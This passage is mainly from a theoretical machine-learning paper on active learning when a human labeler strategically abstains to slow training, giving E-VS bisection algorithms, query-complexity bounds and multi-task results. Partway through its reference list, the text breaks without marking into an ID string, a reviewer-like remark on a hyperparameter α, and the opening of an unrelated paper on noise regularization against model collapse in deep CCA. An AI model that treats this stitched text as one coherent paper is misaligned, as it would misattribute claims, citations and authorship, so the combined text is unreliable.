\max_{y \in \{-1,+1\}} (|E(V[(x,y)], S_X \cup \{x\})| - 1) \leq (|E(V, S_X)| - 1) \left( 1 - \frac{1}{\text{GIC}(V, S_X)} \right).
\]

To analyze the algorithm's query complexity, we lower bound \( \text{Cost}(V, S_X) \) by \( \text{GIC}(V, S_X) \).

Lemma 3.3. For any \( V \subset \mathcal{H} \) and \( S_X \subset \mathcal{X} \): \( \text{GIC}(V, S_X) \leq \text{Cost}(V, S_X) \).

With this, we can prove that Algorithm 2 a) has query complexity \( O(\text{Cost}(\mathcal{H}, \emptyset) \ln |\mathcal{H}|) \); and b) identifies \( h^* \) when the labeler's labeling strategy is identifiable. Please see Appendix C for all the proofs.
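For intuition, the greedy choice that Lemma 3.2 justifies (and which Algorithm 2 below implements in its line 3) can be sketched by reusing the helpers from the Section 2 snippet; again this is a brute-force illustration for toy instances only:

```python
def bisection_query(V, S_X):
    """Greedy step of Algorithm 2: pick the unqueried x whose worst-case
    binary label leaves the smallest E-VS."""
    def worst_case_evs(x):
        return max(len(effective_version_space(version_space(V, [(x, y)]),
                                               S_X | {x}))
                   for y in (+1, -1))
    return min((x for x in X if x not in S_X), key=worst_case_evs)

print(bisection_query(H, frozenset()))  # first query on the Table 1 class
```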
Theorem 3.4 (Algorithm 2's query complexity guarantee). If Algorithm 2 interacts with a labeling oracle \( T \), then it incurs total query cost at most \( \text{GIC}(\mathcal{H}, \emptyset) \ln |\mathcal{H}| + 1 \leq \text{Cost}(\mathcal{H}, \emptyset) \ln |\mathcal{H}| + 1 \). Furthermore, if Algorithm 2 interacts with an identifiable oracle \( T \) consistent with some \( h^* \in \mathcal{H} \), then it identifies \( h^* \).

3.1 Accessing the E-VS

Algorithm 2 may be viewed as the E-VS variant of the well-known VS bisection algorithm (Tong & Koller, 2001), an "aggressive" active learning algorithm that greedily queries the informative point that maximally bisects the VS. The canonical approach for accessing the VS is via sampling, by assuming access to a sampling oracle \( O \). For example, if \( \mathcal{H} \) is linear, the VS is a single polytope and one can use a polytope sampler to evaluate and search for the point \( x \) that maximally bisects the VS.

E-VS Structure: Maximal E-VS bisection point search is less straightforward by contrast. The following structural lemma shows that there exists a setting of linear hypothesis classes in \( \mathbb{R}^d \) with \( \mathcal{X} \) and \( S \) such that the E-VS comprises an exponential number of disjoint polytopes. This means that it is computationally intractable to access the E-VS as polytopes, if one is to use the sampling approach as in VS bisection.

Proposition 3.5. There exist an instance space \( \mathcal{X} \subset \mathbb{R}^d \), a linear hypothesis class \( \mathcal{H} \), and a query response \( S \) such that the resultant E-VS comprises a number of disjoint polytopes exponential in \( d \).

Algorithm 2 E-VS Bisection Algorithm

Require: Data pool \( \mathcal{X} \), hypothesis class \( \mathcal{H} \)
1: \( V \leftarrow \mathcal{H}, S \leftarrow \emptyset \) ▷ VS, queried dataset
2: while \( |E(V, S_X)| \geq 2 \) and \( S_X \neq \mathcal{X} \) do
3: Query: \( x = \arg\min_{x \in \mathcal{X} \setminus S_X} \max_{y \in \{-1,+1\}} |E(V[(x, y)], S_X \cup \{x\})| \) ▷ Maximal E-VS bisection point
4: Labeler \( T \) provides label response: \( y \in \{-1,+1,\bot\} \)
5: \( S \leftarrow S \cup \{(x,y)\}, S_X \leftarrow S_X \cup \{x\} \)
6: if \( y \neq \bot \) then
7: \( V \leftarrow V[(x,y)] \)
8: return \( h \), the unique element in \( E(V, S_X) \)

Algorithm 3 Bisection Point Search Sub-routine

Require: Unqueried examples \( U = \mathcal{X} \setminus S_X \), abstained examples \( S_\bot \), version space \( V \), sampling oracle \( O \)
1: for sample \( h \sim O(V) \) do
2: Construct \( Z_1 = \{(x,-h(x)) : x \in S_\bot\} \), \( Z_2 = \{(x,h(x)) : x \in \mathcal{X} \setminus S_\bot\} \)
3: Run C-ERM to obtain: \( \hat{h} \in \arg\min_{h' \in \mathcal{H}} \{\text{err}(h',Z_1) : \text{err}(h',Z_2) = 0\} \)
4: if \( \hat{h} \neq h \) then continue
5: else ▷ \( h \in E(V, S_X) \) in this case
6: \( r_x^- \leftarrow r_x^- + 1 \) if \( h(x) = -1 \) else \( r_x^+ \leftarrow r_x^+ + 1 \), for \( x \in U \); \( n \leftarrow n + 1 \)
7: return \( x^* = \arg\min_{x \in U} |r_x^+/n - r_x^-/n| \)

Towards tractable maximal E-VS bisection point search: To overcome this issue, we develop a novel, oracle-efficient method for accessing the E-VS. We observe that a structural property of the E-VS can be used to check membership given access to a constrained empirical risk minimization (C-ERM) oracle (Dasgupta et al., 2007). This allows us to design an oracle-efficient subroutine, Algorithm 3, for any general hypothesis class \( \mathcal{H} \), which we prove is sound.
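The membership-check logic behind Algorithm 3 (formalized in Proposition 3.7 below) can be sketched as follows; here the C-ERM oracle is simulated by enumerating \( V \), which is feasible only for toy classes and is meant purely to illustrate the reduction:

```python
def in_evs(h, V, S_bot):
    """Membership test behind Algorithm 3: h is in the E-VS iff the
    constrained ERM over (Z1, Z2) returns h itself. The C-ERM oracle is
    simulated here by explicit enumeration of V."""
    Z2 = [(x, h[x]) for x in X if x not in S_bot]  # must match h off S_⊥
    Z1 = [(x, -h[x]) for x in S_bot]               # rewarded for differing on S_⊥
    feasible = [g for g in V.values() if all(g[x] == y for x, y in Z2)]
    h_hat = min(feasible, key=lambda g: sum(g[x] != y for x, y in Z1))
    return h_hat == h

V = version_space(H, [("x1", BOT)])
print(in_evs(H["h5"], V, {"x1"}))  # True: h5 is identifiable
print(in_evs(H["h1"], V, {"x1"}))  # False: h2 matches h1 off the abstained x1
```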
Definition 3.6. A constrained-ERM oracle for hypothesis class \( \mathcal{H} \), C-ERM, takes as input labeled datasets \( Z_1 \) and \( Z_2 \), and outputs a classifier \( \hat{h} \in \arg\min_{h' \in \mathcal{H}} \{\text{err}(h',Z_1) : \text{err}(h',Z_2) = 0\} \), where for a dataset \( Z \), \( \text{err}(h',Z) = \sum_{(x,y) \in Z} \mathbb{I}(h'(x) \neq y) \).

Proposition 3.7. Given some \( h \in V \) and access to a C-ERM oracle, lines 2 to 7 in Algorithm 3 verify whether \( h \in E(V, S_X) \), with one call to the oracle.

3.2 Comparing with the VS bisection algorithm

Labeling without identifiability: An advantage of the E-VS algorithm is its robustness to strategic labeling. Theorem 3.4 states that the E-VS algorithm has provable guarantees even when the labeler does not guarantee identification. By contrast, VS bisection is not robust in this way. To concretely compare the two, we construct a learning setup without identification, wherein Algorithm 2 incurs a much smaller query cost.

Theorem 3.8. There exist \( \mathcal{H} \) and \( \mathcal{X} \) such that the number of labeled examples queried by the E-VS bisection algorithm is \( O(\log |\mathcal{X}|) \), while the VS bisection algorithm queries \( \Omega(|\mathcal{X}|) \) labels.

Remark: The key observation here is that, by optimistically assuming identifiability (even when this is not guaranteed), Algorithm 2 can ensure a small query cost. It does so by using the E-VS cardinality to detect when the labeling strategy is non-identifiable and halt the interaction. Please refer to Appendix D for all proofs in these subsections and a comparison with EPI-CAL (Huang et al., 2016), a natural "mellow" active learning algorithm that can handle labeler abstentions. Additionally, please see Appendix I for some toy experiments based on synthetic data.

4 Extensions to Other Learning Settings

The prior sections have assumed that the labeler (e.g., a data labeling company) reliably provides noiseless labeled data that exactly identifies \( h^* \). In this section, we examine a few ways in which the labeler (e.g., a human worker) may be imperfect in labeling, and extend our guarantees to show how the learner may learn in such settings. Indeed, it is possible for the labeler to abstain non-strategically simply due to uncertainty (or lack of knowledge) about the label. As we will see, Algorithm 2 also allows for efficient learning with non-strategic, abstaining labelers.

4.1 Approximate Identifiability

A relaxation of the goal of exact learning is PAC learning: learning some \( \hat{h} \) such that its error \( \Pr_{x \sim D}(\hat{h}(x) \neq h^*(x)) \leq \epsilon \) on a distribution \( D \) supported on \( \mathcal{X} \), with probability (w.p.) at least \( 1 - \delta \). This learning goal can arise when the learner wishes to relax the learning outcome/termination criterion, or wishes to weaken the assumption that the labeler identifies \( h^* \) to only knowing a fairly accurate hypothesis \( \hat{h} \in \mathcal{H} \).

Reduction: To study the PAC setting, one may use the standard PAC-to-exact-learning reduction (Vapnik, 1999). It is well known that PAC learning can be reduced to exact learning on a sub-sampled set \( \mathcal{X}^m \subseteq \mathcal{X} \) of \( m = O\left( \frac{\text{VC}(\mathcal{H})}{\epsilon} (\ln \frac{1}{\epsilon} + \ln \frac{1}{\delta}) \right) \) i.i.d. points from \( D \) (VC(\( \mathcal{H} \)) denotes the VC dimension of \( \mathcal{H} \)). Then, \( \mathcal{X}^m \) partitions \( \mathcal{H} \) into clusters of equivalent hypotheses.
Let the projection of \( \mathcal{H} \) on \( \mathcal{X}^m \) be \( \mathcal{H}_{\mathcal{X}^m} = \{ h(\mathcal{X}^m) : h \in \mathcal{H} \} \). For \( y \in \mathcal{H}_{\mathcal{X}^m} \), a cluster \( C(y) \) of equivalent hypotheses may then be defined as \( C(y) = \{ h \in \mathcal{H} : h(\mathcal{X}^m) = y \} \). The reduction guarantees that, w.p. at least \( 1 - \delta \) over the samples \( \mathcal{X}^m \), identifying \( h^* \)'s cluster \( C(h^*(\mathcal{X}^m)) \) suffices for finding \( \hat{h} \) with error \( \leq \epsilon \).

Approximate Identification: Using this reduction, we may analyze the query complexity of approximate identification in the resulting learning game. In this game, the learner sets the data pool to be \( \mathcal{X}^m \) (which can be much smaller than \( \mathcal{X} \)) and aims only to learn the cluster that \( h^* \) belongs to, \( C(h^*(\mathcal{X}^m)) \). We demonstrate how our E-VS representation can be adapted to apply Algorithm 2 in this approximate identification game. We first note that the original E-VS, defined over \( \mathcal{H} \) and \( \mathcal{X}^m \), will no longer suffice as a state representation. Consider some \( h \in \mathcal{H} \) such that \( |C(h(\mathcal{X}^m))| \geq 2 \) with \( \{ h', h \} \subseteq C(h(\mathcal{X}^m)) \). Then, \( h(\mathcal{X}^m) = h'(\mathcal{X}^m) \Rightarrow h'(\mathcal{X}^m \setminus \emptyset) = h(\mathcal{X}^m \setminus \emptyset) \), which results in the premature elimination of the entire \( C(h(\mathcal{X}^m)) \) cluster at the very start. To address this, we define a refinement of the E-VS, the \( \mathcal{X}^m \)-E-VS. This fix follows from observing that in this game, we should only consider non-identifiability with respect to hypotheses from other clusters:
\[
E^{\mathcal{X}^m}(V, S_X) = \{ h \in V : \forall h' \in V \setminus \{ \bar{h} : \bar{h}(\mathcal{X}^m) = h(\mathcal{X}^m), \bar{h} \in V \} : h'(\mathcal{X}^m \setminus S_X) \neq h(\mathcal{X}^m \setminus S_X) \}
\]
With this, we note that the \( \mathcal{X}^m \)-E-VS bisection algorithm attains analogous near-optimal guarantees.

Corollary 4.1. Consider Algorithm 2 instantiated with data pool \( \mathcal{X}^m \) and state representation \( \mathcal{X}^m \)-E-VS. When interacting with a labeling oracle \( T \), it incurs total query cost at most \( \text{GIC}^{\mathcal{X}^m}(\mathcal{H}, \emptyset) \ln |\mathcal{H}| + 1 \) (see Definition 5.2). Furthermore, if the \( \mathcal{X}^m \)-E-VS bisection algorithm interacts with an identifiable oracle \( T \) consistent with some \( h^* \in \mathcal{H} \), then it identifies \( h^* \).

The only remaining consideration is how to efficiently search for the point that maximally bisects clusters in the \( \mathcal{X}^m \)-E-VS. Here, we show that we may adapt the membership check implemented in Algorithm 3 (with the data pool set to \( \mathcal{X}^m \)) to check hypothesis membership in the coarser \( \mathcal{X}^m \)-E-VS. That is, we still have an oracle-efficient way of accessing the \( \mathcal{X}^m \)-E-VS, without needing to explicitly compute and iterate through the clusters.

Proposition 4.2. \( h \not\in E^{\mathcal{X}^m}(V, S_X) \) iff \( \hat{h}(\mathcal{X}^m) \neq h(\mathcal{X}^m) \), where \( \hat{h} \) is the minimizer of the C-ERM output on Algorithm 3 Line 3 with \( \mathcal{X} = \mathcal{X}^m \).

4.2 Noised Labeling

In some cases, a labeler can make honest mistakes simply due to human error. We can model this by assuming noised queries (Castro & Nowak, 2008): querying example \( x \) returns \( h^*(x) \) w.p. \( 1 - \delta(x) \), and \( -h^*(x) \) w.p. \( \delta(x) \). In this setup, we may use the common approach of repeatedly querying a datum to estimate its label w.h.p. (e.g., as in Yan et al., 2016). This approach thus reduces the noised-label setting to cost-sensitive exact learning, where each \( x \) incurs a differing cost \( c(x) \) depending on \( \delta(x) \).
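As an illustration of this reduction, here is a small sketch of the repeated-query estimator; the sample-size constant comes from a standard Hoeffding bound rather than from our appendix, and the helper names are ours:

```python
import math
import random

def estimate_label(query, delta_x, fail_prob):
    """Majority vote over repeated noisy queries of one example x.

    Assumes flip probability delta_x < 1/2. By Hoeffding's inequality,
    m = ceil(ln(1/fail_prob) / (2 * (1/2 - delta_x)**2)) repeats make the
    majority equal h*(x) with probability at least 1 - fail_prob; m plays
    the role of the per-example cost c(x)."""
    gap = 0.5 - delta_x
    m = math.ceil(math.log(1.0 / fail_prob) / (2.0 * gap ** 2))
    votes = sum(query() for _ in range(m))  # each query returns +1 or -1
    return (+1 if votes > 0 else -1), m

# Toy usage: true label +1, flipped with probability 0.2.
noisy_query = lambda: +1 if random.random() > 0.2 else -1
label, cost_x = estimate_label(noisy_query, delta_x=0.2, fail_prob=1e-3)
```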
In Appendix C, we prove a generalized version of the results in Section 3 that factors in example-dependent costs, showing that Algorithm 2 can be applied in this setting with near-optimal guarantees.

4.3 Arbitrary Labeling

Thus far, we have assumed a labeler who can (approximately) identify \( h^* \). Here, we touch on the case when the labeler either does not know \( h^* \) (or \( h^* \)'s cluster), or myopically labels in a way that cannot guarantee the learning outcome. Since the labeler behaves arbitrarily, the learner now cannot be assured of any learning outcome guarantees. In this case, we note that the learner can use the E-VS to preemptively detect when the learning outcome cannot be realized, and halt the interaction. While $h^*$ is unknown, it is possible to detect when no hypothesis/cluster is learnable: this is when the E-VS is empty, certifying that the labeler cannot realize the learning outcome. Here, our Theorem 3.4 provides guarantees on the maximum number of times that a non-identifiable oracle will be queried.

**Corollary 4.3 (of Theorem 3.4).** Algorithm 2 guarantees bounded query complexity $\text{GIC}(\mathcal{H}, \emptyset) \ln |\mathcal{H}| + 1$ even when the labeling oracle is non-identifiable.

Finally, we note that our algorithm is sound in that if the labeler can identify $h^*$, then our algorithm learns $h^*$. Thus, in summary, Algorithm 2 is both sample-efficient with respect to an identifiable labeler, and robust to a non-identifiable one. Please see Appendix E for more details on this section.

## 5 Multi-Task Learning from a Strategic Labeler

**Multi-task setting:** In most jobs, workers in fact perform multiple roles. This motivates the study of multi-task exact learning from a strategic labeler, which we now outline:

- The learner is now interested in learning multiple $h_i^* \in \mathcal{H}_i$, for tasks $i \in [n]$. Define the learner's hypothesis class $\mathcal{H} = \times_{i=1}^{n} \mathcal{H}_i$, which contains $h^* = (h_1^*, \ldots, h_n^*)$. The learner can query from instance domain $\mathcal{X} \subseteq \times_{i=1}^{n} \mathcal{X}_i$, where $\mathcal{X}_i$ is the instance domain for task $i$.
- The labeler now provides multi-task labels $y \in \mathcal{Y}^n = \{+1, -1, \bot\}^n$, and for the label cost: i) one natural extension of the single-task payoff is $c_{one}(y) = \mathbb{I}(\exists i, y_i \neq \bot)$; ii) another variant of the multi-task labeling payoff is $c_{all}(y) = \mathbb{I}(\forall i, y_i \neq \bot)$.

We are interested in asking: can the labeler use the multi-task structure to further amplify the query complexity? To answer this question, we relate the multi-task query complexity to that of the single tasks.

**Single-task setting:**

- **Definition of $S_X^i$:** given queried data $S_X$, define the queried data for task $i$, $S_X^i$, as $S_X^i = \mathcal{X}_i \setminus (\mathcal{X} \setminus S_X)_i$, where we use the notation $Z_i = \{x_i : x \in Z\}$ for $Z \subseteq \mathcal{X}$. In words, $S_X^i$ consists of the examples in $\mathcal{X}_i$ whose labels can no longer be obtained. Note that in the multi-task setting, there may exist multiple points that can label some $x_i \in \mathcal{X}_i$, so abstention on one of those points does not necessarily mean that $x_i$ cannot be labeled. **Example:** let $\mathcal{X} = \{x_{11}, x_{12}\} \times \{x_{21}, x_{22}\}$ with $S_X = \{[x_{11}, x_{21}], [x_{12}, x_{22}]\}$; then $S_X^i = \emptyset$ for $i = 1, 2$. This is because it is still possible for the labeler to give labels on all points, i.e.,
$x_{11}, x_{22}$ through $[x_{11}, x_{22}]$ and $x_{12}, x_{21}$ through $[x_{12}, x_{21}]$.

- **Definition of $V_i$:** given the current multi-task version space $V$, we can naturally define the single-task version space for task $i$ as $(V)_i = V_i = \{h_i : h \in V\}$.

### 5.1 Upper Bound

To understand if the multi-task structure can inflate query complexity, we upper bound the multi-task complexity in terms of the sum of the single-task complexities. Proving an upper bound would imply that the labeler cannot increase the query complexity through the multi-task structure. We find that upper bounds only arise under certain regularity assumptions. Thus, we first provide complementary negative results without these assumptions, showing settings where the labeler can amplify the multi-task query complexity. All proofs in this section may be found in Appendix E, where we also prove results in the non-abstention setting that may be of independent interest.

**Proposition 5.1.** Under both label costs, there exist a non-Cartesian-product version space $V \subseteq \mathcal{H}$ and query response $S \subseteq (\mathcal{X} \times \mathcal{Y})^*$ such that $\text{Cost}(V_i, S_X^i) \geq 0$ for all $i$, and: $\text{Cost}(V, S_X) \geq \sum_{i=1}^{n} \text{Cost}(V_i, S_X^i) + n - 1$.

Furthermore, we show that if the version space is allowed to be a Cartesian product, and the (more generous) $c_{one}$ is used as the label cost, the labeler can still increase the query complexity.

**Proposition 5.2.** Assuming the version space is a Cartesian product, under label cost $c_{one}(y) = \mathbb{I}(\exists i, y_i \neq \bot)$, there exist $V$ and $S$ such that $\text{Cost}(V_i, S_X^i) = 1$, but $\text{Cost}(V, S_X) = |\mathcal{X}|$. This implies that $\text{Cost}(V, S_X) > \sum_{i=1}^{n} \text{Cost}(V_i, S_X^i)$.

Thus, for the labeler to be unable to increase the multi-task query complexity, two necessary conditions are: a) the VS is a Cartesian product, and b) the payoff cost is $c_{all}$ (and not $c_{one}$). Below, we prove that the two conditions are sufficient, providing a full characterization of when the upper bound can be achieved.

**Theorem 5.3.** For all $V = \times_{i \in [n]} V_i$ and $S_X \subseteq \mathcal{X}$, under labeling cost $c_{all}(y) = \mathbb{I}(\forall i, y_i \neq \bot)$,
$$\text{Cost}(V, S_X) \leq \sum_{i=1}^{n} \text{Cost}(V_i, S^i_X).$$

For the remainder of the section, we will prove results under the (more generous) label cost, $c_{one}$.

### 5.2 Lower Bound

Through lower bounds, we illustrate that the multi-task version space structure can in fact speed up learning as well. The intuition is that the structure in $V$ may make the multi-task E-VS shrink faster due to unidentifiability. The following negative example evidences this.

**Proposition 5.4.** There exist a non-Cartesian-product version space $V$ and query response $S$ such that $\text{Cost}(V_i, S^i_X) \geq 0$ for all $i$, but: $\text{Cost}(V, S_X) < \max_{i \in [n]} \text{Cost}(V_i, S^i_X)$.

**Proposition 5.5.** There exist a Cartesian-product version space $V$ and query response $S$ with $\text{Cost}(V, S_X) < 0$ such that: $\text{Cost}(V, S_X) < \max_{i \in [n]} \text{Cost}(V_i, S^i_X)$.

Thus, identifiability ($\text{Cost}(V, S_X) \geq 0$) and $V$ being a Cartesian product are both needed to prove a lower bound.

**Theorem 5.6.** For all $V = \times_{i \in [n]} V_i$ and $S_X \subseteq \mathcal{X}$, if $\text{Cost}(V, S_X) \geq 0$, then: $\text{Cost}(V, S_X) \geq \max_{i \in [n]} \text{Cost}(V_i, S^i_X)$.
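To make the per-task bookkeeping and the two label costs of this section concrete, here is a small sketch on the two-task example above (the helper names are ours):

```python
BOT = None  # abstention

def S_X_i(X_pool, S_X, i):
    """S_X^i = X_i \\ (X \\ S_X)_i: task-i examples whose labels can no
    longer be obtained from any remaining multi-task query."""
    X_i = {x[i] for x in X_pool}
    still_coverable = {x[i] for x in X_pool if x not in S_X}
    return X_i - still_coverable

def c_one(y):  # pay 1 if at least one task is labeled
    return int(any(y_i is not BOT for y_i in y))

def c_all(y):  # pay 1 only if every task is labeled
    return int(all(y_i is not BOT for y_i in y))

# X = {x11, x12} x {x21, x22}; the two "diagonal" points were queried.
X_pool = {("x11", "x21"), ("x11", "x22"), ("x12", "x21"), ("x12", "x22")}
S_X = {("x11", "x21"), ("x12", "x22")}
print(S_X_i(X_pool, S_X, 0), S_X_i(X_pool, S_X, 1))  # set() set()
```

Both outputs are empty, matching the example: the remaining points $[x_{11}, x_{22}]$ and $[x_{12}, x_{21}]$ still cover every single-task example.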
### 6 Related Works

The theory of Active Learning (AL) (Hanneke, 2009) has a rich history and began with the study of realizable learning (Angluin, 1988; Hegedüs, 1995; Freund et al., 1997; Dasgupta, 2004; Dasgupta et al., 2005). To the best of our knowledge, we are the first to consider a labeler whose objective is at odds with the learner's. In the face of such a strategic labeler, we develop an active learning algorithm with near-optimal query complexity guarantees.

**Abstaining Labeler:** The closest two papers to our work are Yan et al. (2016); Huang et al. (2016), which also study learning from an abstaining labeler. In Yan et al. (2016), the labeler can abstain or return a noisy label, where the rate of an incorrect label/abstention is fixed a priori. Our work differs from that of Yan et al. (2016, 2015) in that the labeler can adaptively label (or abstain) based on the full interaction history so far, thus allowing for more complex, sequential labeling strategies. In Huang et al. (2016), the labeler abstains when uninformed, and after a number of abstentions in a region, learns to label the region (an "epiphany"). Our setting differs in that the labeler does know the labels for all regions, but instead strategically abstains to increase the query complexity. Please see Appendix H for further discussion on related works and on alternative formulations of the learning game, including when the learner is allowed to query an example multiple times.

### 7 Discussion

In this paper, we provide the first set of theoretical evidence that labelers can slow down learning through strategic abstentions, making even active learning algorithms sample-inefficient. Motivated by this, we study the learning game involving a strategic labeler, in both the single- and multi-task settings. Our theoretical study is motivated by the broader observation that a labeler's objective may be fundamentally at odds with the learner's. This conflict of interest arises, for instance, in the AI-automation setting, where workers have the incentive to slow down model training, in order to delay replacement and to maximize compensation for their labeling services in the meantime.

**Societal/Broader Impact:** Zooming further out, workers have an incentive to slow down training if they lack financial security after being replaced. Indeed, ML offers tremendous potential in bettering our lives, automating away jobs people do not want to do. However, it can also automate away jobs that people do want to do. It is our hope that this paper adds to the important discussion on whether we should always automate once we have the ability to do so, as well as the discussion on fair labeler compensation during the automation process (De Vynck, 2023).

REFERENCES

Dana Angluin. Queries and concept learning. *Machine Learning*, 2:319–342, 1988.

Thor Benson. Your boss's spyware could train AI to replace you. *Wired*, 2023. URL https://www.wired.com/story/corporate-surveillance-train-ai/.

James N Brown and Robert W Rosenthal. Testing the minimax hypothesis: A re-examination of O'Neill's game experiment. *Econometrica: Journal of the Econometric Society*, pp. 1065–1081, 1990.

Rui M Castro and Robert D Nowak. Minimax bounds for active learning. *IEEE Transactions on Information Theory*, 54(5):2339–2353, 2008.

Yiling Chen, Chara Podimata, Ariel D Procaccia, and Nisarg Shah. Strategyproof linear regression in high dimensions. In *Proceedings of the 2018 ACM Conference on Economics and Computation*, pp. 9–26, 2018.

Sanjoy Dasgupta. Analysis of a greedy active learning strategy.
*Advances in Neural Information Processing Systems*, 17, 2004.

Sanjoy Dasgupta, Adam Tauman Kalai, and Claire Monteleoni. Analysis of perceptron-based active learning. In *International Conference on Computational Learning Theory*, pp. 249–263. Springer, 2005.

Sanjoy Dasgupta, Daniel J Hsu, and Claire Monteleoni. A general agnostic active learning algorithm. *Advances in Neural Information Processing Systems*, 20, 2007.

Gerrit De Vynck. AI learned from their work. Now they want compensation. *Washington Post*, 2023. URL https://www.washingtonpost.com/technology/2023/07/16/ai-programs-training-lawsuits-fair-use/.

Ofer Dekel, Felix Fischer, and Ariel D Procaccia. Incentive compatible regression learning. *Journal of Computer and System Sciences*, 76(8):759–777, 2010.

Yoav Freund, H Sebastian Seung, Eli Shamir, and Naftali Tishby. Selective sampling using the query by committee algorithm. *Machine Learning*, 28:133–168, 1997.

Drew Fudenberg and Luis Rayo. Training and effort dynamics in apprenticeship. *American Economic Review*, 109(11):3780–3812, 2019.

Luis Garicano and Luis Rayo. Relational knowledge transfers. *American Economic Review*, 107(9):2695–2730, 2017.

Daniel Golovin and Andreas Krause. Adaptive submodularity: A new approach to active learning and stochastic optimization. In *COLT*, pp. 333–345, 2010.

Steve Hanneke. The cost complexity of interactive learning. *Unpublished manuscript*, 2006.

Steve Hanneke. *Theoretical Foundations of Active Learning*. Carnegie Mellon University, 2009.

Steve Hanneke et al. Theory of disagreement-based active learning. *Foundations and Trends® in Machine Learning*, 7(2-3):131–309, 2014.

Moritz Hardt, Nimrod Megiddo, Christos Papadimitriou, and Mary Wootters. Strategic classification. In *Proceedings of the 2016 ACM Conference on Innovations in Theoretical Computer Science*, pp. 111–122, 2016.

Tibor Hegedüs. Generalized teaching dimensions and the query complexity of learning. In *Proceedings of the Eighth Annual Conference on Computational Learning Theory*, pp. 108–117, 1995.

Tzu-Kuo Huang, Lihong Li, Ara Vartanian, Saleema Amershi, and Jerry Zhu. Active learning with oracle epiphany. *Advances in Neural Information Processing Systems*, 29, 2016.

Tom M Mitchell. Generalization as search. *Artificial Intelligence*, 18(2):203–226, 1982.
mHv6wcBb0z
The choice of the optimal value for the hyperparameter α in Equation 6 is crucial. If α is set too large, the model may tend to behave like an identity mapping function, potentially reducing its effectiveness. Conversely, if α is too small, the model may not maintain a "full-rank" transformation, and model collapse may not be effectively prevented.
PREVENTING MODEL COLLAPSE IN DEEP CANONICAL CORRELATION ANALYSIS BY NOISE REGULARIZATION

Anonymous authors Paper under double-blind review

ABSTRACT

Multi-View Representation Learning (MVRL) aims to learn a unified representation of an object from multi-view data. Deep Canonical Correlation Analysis (DCCA) and its variants share simple formulations and demonstrate state-of-the-art performance. However, with extensive experiments, we observe the issue of model collapse, i.e., the performance of DCCA-based methods drops drastically as training proceeds. The model collapse issue could significantly hinder the wide adoption of DCCA-based methods because it is challenging to decide when to stop early. To this end, we develop NR-DCCA, which is equipped with a novel noise regularization approach to prevent model collapse. Theoretical analysis shows that the full-rank property of the transformation is the key to preventing model collapse, and our noise regularization constrains the neural network to be "full-rank". A framework to construct synthetic data with different common and complementary information is also developed to compare MVRL methods comprehensively. The developed NR-DCCA outperforms baselines stably and consistently on both synthetic and real-world datasets, and the proposed noise regularization approach can also be generalized to other DCCA-based methods such as DGCCA.

Keywords: Multi-view representation learning; Canonical Correlation Analysis; Deep Canonical Correlation Analysis; Noise regularization; Model collapse

1 INTRODUCTION

In recent years, multi-view representation learning (MVRL) has emerged as a core technology for learning from multi-source data and providing readily useful representations to downstream tasks (Sun et al., 2023; Yan et al., 2021), and it has achieved tremendous success in various applications, such as video surveillance (Guo et al., 2015; Feichtenhofer et al., 2016; Deepak et al., 2021), medical diagnosis (Wei et al., 2019; Xu et al., 2020), and social media (Srivastava & Salakhutdinov, 2012; Karpathy & Fei-Fei, 2015; Mao et al., 2014; Fan et al., 2020). Specifically, we collect multi-source data of the same object, and each data source can be regarded as one view of the object. For instance, an object can be described simultaneously through texts, videos, and audio, which contain both common and complementary information about the object (Yan et al., 2021; Zhang et al., 2019b; Hwang et al., 2021; Geng et al., 2021), and MVRL aims to learn a unified representation of the object from the multi-view data.

The key challenge of MVRL is to learn the intricate relationships between different views. Canonical Correlation Analysis (CCA), one of the early and representative methods for MVRL, transforms all the views into a unified space by maximizing their correlations (Hotelling, 1992; Horst, 1961; Hardoon et al., 2004; Lahat et al., 2015; Yan et al., 2023; Sun et al., 2023). Through correlation maximization, CCA can identify the common information between different views and extract it to form the representation of the object. On top of CCA, DCCA further utilizes powerful deep neural networks (DNNs) to transform each view and then adopts CCA to maximize the correlation of the transformed views (Andrew et al., 2013). Indeed, there are quite a few variants of DCCA, such as DGCCA (Benton et al., 2017), DCCAE (Wang et al., 2015), DVCCA (Wang et al., 2016), DTCCA (Wong et al., 2021) and DCCA_GHA (Chapman et al., 2022).
However, with extensive experiments, we observe that DCCA-based methods generally perform well at the early training stage, while their performance drops drastically as training proceeds. This issue is referred to as model collapse. Essentially, model collapse is mainly attributed to the overly powerful transformation abilities of DNNs: the maximized correlation may not come from the views, but rather from the model correlation among the neural networks, as shown in Figure 1. Although the representation produced by DCCA-based methods is naturally full-rank, the feature space may still become degenerate due to unregularized neural networks. In contrast, CCA-based methods utilize linear transformations, which are forced to be full-rank matrices, and hence there is no such model collapse issue. Though early stopping could be adopted to prevent model collapse (Prechelt, 1998; Yao et al., 2007), it remains challenging to decide when to stop. The model collapse issue of DCCA-based methods prevents their adoption in large models, and currently, many applications still use simple concatenation to combine different views (Yan et al., 2021; Zheng et al., 2020; Nie et al., 2017). Therefore, how to develop a DCCA-based MVRL method without model collapse remains an interesting and open question.

We prove that the main reason CCA does not have the model collapse issue is that the full-rank property holds for its transformation matrix, while the DNNs in DCCA do not possess such a property. To this end, we develop a novel idea that employs noise regularization to enforce the DNNs to be "full-rank". Note that the proposed noise regularization approach is novel and particularly tailored for DCCA-based methods, which is different from existing approaches that directly inject noise into the neural networks (Poole et al., 2014; He et al., 2019; Gong et al., 2020).

Overall, this paper develops NR-DCCA, a DCCA method equipped with a generalized noise regularization approach. The proposed noise regularization approach constrains the DNNs to be "full-rank", and it can also be applied to other DCCA-based methods. To justify the approach, the formulation of CCA is analyzed and rigorous proofs are provided. Comprehensive experiments using both synthetic datasets and real-world datasets demonstrate the consistent outperformance and stability of the developed NR-DCCA method. Our contributions are four-fold:

- The model collapse issue in DCCA-based methods for MVRL is identified, demonstrated, and explained.
- A simple yet effective noise regularization approach is proposed and the NR-DCCA method is developed to prevent model collapse.
- Rigorous proofs are provided to demonstrate that the full-rank property of the transformation in the CCA method is the key to preventing model collapse, which justifies the developed noise regularization approach from a theoretical perspective.
- A novel framework is proposed to construct synthetic data with different common and complementary information for comprehensively evaluating MVRL methods.

2 RELATED WORKS

2.1 MULTI-VIEW REPRESENTATION LEARNING

MVRL aims to uncover relationships among multi-view data in an unsupervised manner, thereby obtaining semantically rich representations that can be utilized for various downstream tasks (Sun et al., 2023; Yan et al., 2021). A number of works have been proposed to deal with MVRL from different aspects. DMF-MVC (Zhao et al., 2017) utilizes deep matrix factorization to extract a shared representation from multiple views.
